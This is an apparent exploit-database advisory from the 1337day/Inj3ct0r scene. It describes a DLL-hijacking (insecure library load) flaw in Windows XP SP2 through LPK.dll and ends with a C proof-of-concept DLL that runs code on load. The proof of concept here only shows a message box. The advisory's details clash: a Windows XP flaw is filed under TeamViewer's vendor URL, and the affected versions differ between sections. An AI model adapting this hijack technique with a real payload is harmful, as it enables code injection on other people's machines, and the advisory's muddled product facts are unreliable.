1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm The Black Devils member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Author Word : This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. 1. ADVISORY INFORMATION ----------------------- Product: Microsoft Windows XP Professionnel Service Pack 2&3 Insecure Library Load Vendor URL: http://www.teamviewer.com/fr/index.aspx Date found: 2013-02-26 Date published: 2013-02-26 2. CREDITS ---------- This vulnerability was discovered and researched by The Black Devils 3. VERSIONS AFFECTED -------------------- Microsoft Windows XP Professionnel Service Pack 2, older versions may be affected too. 4. VULNERABILITY DESCRIPTION ---------------------------- An insecure library loading vulnerability has been identified in Microsoft Windows XP Professionnel Service Pack 2. The application uses a fixed path to look for specific files or libraries. This path includes directories that may not be trusted or under user control. By placing a custom version of a library in the application path, the program will load it before the legitimate version. This allows an attacker to inject custom code that will be run with the privilege of the program or user executing the program. The following libraries could be hijacked on this way: LPK.dll 5. PROOF-OF-CONCEPT (CODE / Exploit) ------------------------------------ // wine gcc -Wall -shared inject.c -o LPK.dll #include <windows.h> BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpvReserved) { if (dwReason == DLL_PROCESS_ATTACH) { MessageBox(0,"Inj3ctor","The Black Devils", 0); } return TRUE; }